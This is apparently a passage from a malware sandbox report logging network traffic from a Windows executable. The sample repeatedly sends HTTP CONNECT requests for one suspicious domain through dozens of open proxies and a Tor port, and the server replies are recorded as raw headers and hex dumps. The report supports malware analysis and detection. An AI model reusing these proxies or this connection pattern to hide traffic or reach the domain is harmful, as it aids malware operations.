                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.271019936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.292629004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      950192.168.2.45077227.147.220.11080906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.209695101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.993757963 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      951192.168.2.45286054.38.179.203604066812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.216376066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.829823971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.350119114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.370228052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.342820883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.292546988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      952192.168.2.45023191.121.89.4131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.226087093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.365672112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.366089106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.366281033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      953192.168.2.452821161.189.49.2631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.226089001 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:23.858731985 CET146INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: PHP/5.4.7
                                                                                                      Server: squid/4.10
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:24.287950993 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:
                                                                                                      Feb 23, 2024 09:45:24.288839102 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      954192.168.2.45286672.210.221.19741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.226213932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      955192.168.2.452867212.47.245.57163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.226392984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.735078096 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                      Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      956192.168.2.45286431.170.22.12710806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.235347986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      957192.168.2.450177188.252.14.731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.235917091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.365675926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.366089106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.366281986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      958192.168.2.45283743.133.80.236156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.235917091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      959192.168.2.450173212.115.232.79312806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.235919952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.365700006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.366089106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      960192.168.2.45027751.195.139.95246046812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.244853973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      961192.168.2.452830103.212.95.253413636812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.245282888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      962192.168.2.45082258.69.125.14580816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.245691061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.252243042 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      963192.168.2.452211120.194.4.157826812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.248809099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.813900948 CET319INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 170
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      964192.168.2.452423173.249.33.122475376812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.253000021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.365719080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.366105080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.366297960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      965192.168.2.450229190.52.165.12080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.262985945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.365780115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.366101027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.966759920 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      966192.168.2.452833128.199.202.12231286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.262986898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.655874014 CET28INHTTP/1.1 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      967192.168.2.450285193.34.93.221338616812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.263084888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      968192.168.2.45286578.186.18.14236296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.263086081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      969192.168.2.452859211.222.252.18781936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.263192892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      970192.168.2.45288070.166.167.55577456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.263197899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      971192.168.2.45284741.65.236.3519816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.271672010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.121901035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.147030115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.129884005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.061091900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.969532967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.846242905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.506160021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.803023100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      972192.168.2.45287637.235.48.19806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.272300005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      973192.168.2.452848103.118.46.6180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.298734903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.642740965 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      974192.168.2.452883213.6.68.21041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.312913895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      975192.168.2.452850103.200.135.23041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.312913895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      976192.168.2.452502128.199.5.121323396812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.316569090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.443717003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.537708998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.647125959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      977192.168.2.452887177.12.118.160806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.317266941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      978192.168.2.450983109.238.12.156267706812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:23.321751118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.443783045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
